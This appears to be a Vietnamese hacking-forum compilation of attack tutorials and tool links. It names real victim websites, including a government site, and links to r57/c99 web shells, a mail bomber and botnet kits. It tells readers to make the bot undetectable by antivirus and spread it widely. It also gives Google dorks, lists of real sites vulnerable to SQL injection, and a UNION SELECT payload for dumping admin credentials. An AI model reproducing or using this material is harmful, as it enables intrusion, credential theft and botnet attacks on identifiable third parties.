[Tut] Padding Orale Attack

Victim: http://bigc.vn/

 

Kiểm tra lỗi Padding Orale

View source:

Chú ý đoạn code sau:

/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 

Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

http://www.activestate.com/activeperl/downloads

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:

http://www.mediafire.com/?a0auo2tca0ffdfe

Web.config_bruter.pl:

http://www.mediafire.com/?3twc9xwizdcdw8p

pass unlock: soleil_vhb

pass giải nén: ceh.vn

[Bài 2 - Local Attack] Giới Thiệu Tính Năng 1 Sô Shell

Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php

https://drive.google.com/file/d/0BxTrDVTYt0wwcS1pczN4cXpKM1E/edit?usp=sharing

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.

c99.php

https://drive.google.com/file/d/0BxTrDVTYt0wwVXpGVHlXTHdyalU/edit?usp=sharing

Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu

Tool Bom Mail MaxBomber

Tool Bom Mail Good MaxBomber:

Hình ảnh demo victim bị tấn công:

   

-           

   

[Ddos-BotNet] seo4loader

Đây là code botnet mạnh nhât hiện nay.

Link download:  http://www.mediafire.com/?x7fdp13fhtad1d6

pass download: ceh.vn
pass giải nén: soleil_vhb

[Google Dork] SQl - Public 16/6

Google Dork : inurl:Default.aspx?PageID= 

Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:

http://ducdung08clc.blogspot.com/2012/03/bai-3-sqli-khai-thac-oi-voi-aspx_17.html

Sau đây là 1 số site dính lỗi này:

http://www.macktrucks.com/default.aspx?pageid=40%27

http://ncm-society.org/default.aspx?PageID=1067%27

http://www.ariahealth.org/default.aspx?pageid=3330%27

http://ncm-society.org/default.aspx?PageID=1056%27

http://www.araiamericas.com/default.aspx?pageid=92%27

http://www.trexta.com/Default.aspx?pageID=17&CatID=38%27             

http://www.hurriyetdailynews.com/Default.aspx?pageID=428%27        

http://www.tapack.com/Default.aspx?pageid=115%27

www.sagiang.com.vn/Default.aspx?pageid=57'               

www.trexta.com/Default.aspx?pageID=18&CatID=186&PID=359'

http://www.bliss-stick.com/default.aspx?pageid=27%27            

http://nhadatanbien.com/default.aspx?pageid=projectdt&id=91%27

http://www.macktrucks.com/default.aspx?pageid=40%27

www.danangportvn.com/Default.aspx?PageId=183'

http://danangupi.vn/Default.aspx?PageId=125%27       

http://www.phanmemhoinhap.com/default.aspx?pageid=008'&display=gec.net

http://www.bmcgroup.com.vn/Default.aspx?PageId=363%27  

http://www.gentexcorp.com/default.aspx?pageid=2685%27

http://www.araiamericas.com/default.aspx?pageid=92%27

Tham khảo: http://1337day.com/exploits/18665

[bug] Wp - RevolutionTechnologies - SQLI

Dorck :   inurl:"/page.php?IDMenu=" revolutiontechnologies

http://www.kyokuten.net/page.php?IDMenu=967&IDLang=1%27

http://sdtrb-sofia.com/page.php?IDMenu=848&IDLang=1%27

http://sdtrb.revolutiontechnologies.net/page.php?IDMenu=845&IDLang=1%27

http://www.labsystems.bg/page.php?IDMenu=7%27

http://www.givelconsult.com/page.php?IDMenu=32%27

http://build.verum.bg/page.php?IDMenu=846&IDLang=2%27

http://www.spoon-golf.de/page.php?IDMenu=853&IDLang=4%27

http://revolutiontechnologies.eu/page.php?IDMenu=852&IDLang=2%27

[Bonet] G-bot 2.2

Code + Data + File Buider  G-Bot version 2.2.  Code này được viết bới các hacker người nga.

Cách sử dụng:

-  Upcode + Database lên host sau đó chỉnh sửa các thông số trong file config ( bao gồm cả pass để dăng nhập nữa)

-  Click vào file buider.exe để tạo bot.

Host: tên domain

Path : Đường dẫn tới code botnet:

- Bước còn lại là bạn file mã hóa con bot này khỏi tât cả antivirus và phát tán nó càng nhiều càng tốt để tạo 1 mạng lưới bot lớn.


Link download: 

G-Bot 2.2 : http://www.mediafire.com/download.php?o9mg3berija7jpj
G-bot 1.7 :  http://www.mediafire.com/download.php?3qbxeyuvqhoxidi


Pass dải nén: vhb

[Tut] Tổng Hợp Các Dạng Tut Hack Web Cơ Bản

Như tiêu đề, Soleil tổng hợp các dạng tut Hack Web của ae hacker đi trước đã để lại để cho các bạn mới bước vào con đường hacking dễ tra cứu và học tập. Chủ yếu là các vấn đề xoay quanh local attack & Upshell   -  2 Kỹ năng quan trọng trong không thể thiếu trong website hacking!

 Phần I:

Download:  http://www.mediafire.com/?sodnvn6iv9so1ov

pass: soleil_vhb 

Phần II: 

Download:  http://www.mediafire.com/?2jlwk2q5sl826kk

pass: soleil_vhb 

1. Local Attack

 1.26MB – Tác Giả: Unlock_virus
Video Hướng dẫn sử dụng Shell và local ( rất căn bản cho newbie)

2. Local- Mastercarder.org 

7.35MB – Tác Giả: Chưa Rõ
Video Local Mastercarder.org và giải mã file config bị mã hóa (BYpass qua MySQL

3. Local attack,Upload shell 

1.86MB – Tác Giả: d0nd0c(Vniss)
Video local cardheaven.net rất căn bản , dành cho newbie

[Bug] WebX (showsubpage.asp) SQLI

1. Google dork:   

inurl:"showsubpage.asp" "Powered By: WebX" 

2. Khai thác

-  Thêm Query 

null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

  vào sau  http://www.victim.com/showsubpage.asp?subid=

- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin

Ví dụ: 

http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1

-  Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google

Up Shell Voi NuKeViet

Victim : http://dansodaklak.gov.vn

Bước 1: Đăng nhập với quyền quản trị  

http://dansodaklak.gov.vn/admin/index.php